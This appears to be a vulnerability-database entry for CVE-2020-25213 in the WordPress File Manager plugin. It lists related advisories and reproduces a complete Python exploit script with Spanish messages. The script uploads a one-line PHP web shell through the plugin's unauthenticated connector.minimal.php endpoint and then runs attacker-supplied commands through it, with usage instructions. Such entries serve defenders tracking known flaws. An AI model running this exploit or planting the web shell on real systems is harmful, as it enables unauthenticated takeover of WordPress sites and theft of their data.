WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE

🗓️ 03 Apr 2023 00:00:00Reported by BLYType

exploitdb🔗 www.exploit-db.com👁 228 Views

WP-file-manager v6.9 Unauthenticated Arbitrary File Upload leading to RCE. Exploits via upload of shell.php file to execute command

Reporter	Title	Published	Views	Family All 33
0day.today	WordPress File Manager 6.8 Remote Code Execution Exploit	10 Nov 202000:00	–	zdt
0day.today	WordPress WP-file-manager v6.9 Plugin - Unauthenticated Arbitrary File Upload Exploit	3 Apr 202300:00	–	zdt
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File_Manager	25 Aug 202022:07	–	githubexploit
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File_Manager	22 Jan 202316:54	–	githubexploit
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Filemanagerpro File_Manager	10 May 202612:07	–	githubexploit
ATTACKERKB	CVE-2020-25213	9 Sep 202000:00	–	attackerkb
Circl	CVE-2020-25213	17 Oct 202020:40	–	circl
CISA KEV Catalog	WordPress File Manager Plugin Remote Code Execution Vulnerability	3 Nov 202100:00	–	cisa_kev
CNVD	WordPress wp-file-manager Arbitrary File Upload Vulnerability	14 Sep 202000:00	–	cnvd
Check Point Advisories	WordPress File Manager Plugin Remote Code Execution (CVE-2020-25213)	29 Sep 202000:00	–	checkpoint_advisories

#!/usr/bin/env

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]

import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig,frame):
	print ("[!]Saliendo")
	sys.exit(1)

signal.signal(signal.SIGINT,handler)

def commandexec(command):

	exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
	params = {
		"cmd":command
	}

	r=requests.get(exec_url,params=params)

	soup = BeautifulSoup(r.text, 'html.parser')
	text = soup.get_text()

	print (text)
def exploit():

	global url

	url = sys.argv[1]
	command = sys.argv[2]
	upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

	headers = {
			'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
			'Connection': "close" 
	}

	payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

	try:
		r=requests.post(upload_url,data=payload,headers=headers)
		#pprint(r.json())
		commandexec(command)
	except:
		print("[!] Algo ha salido mal...")




def help():

	print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
	print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")




if __name__ == '__main__':

	if len(sys.argv) != 3:
		help()

	else:
		exploit()

03 Apr 2023 00:00Current

9.6High risk

Vulners AI Score9.6

CVSS 27.5

CVSS 3.19.8 - 10

EPSS0.94411

SSVC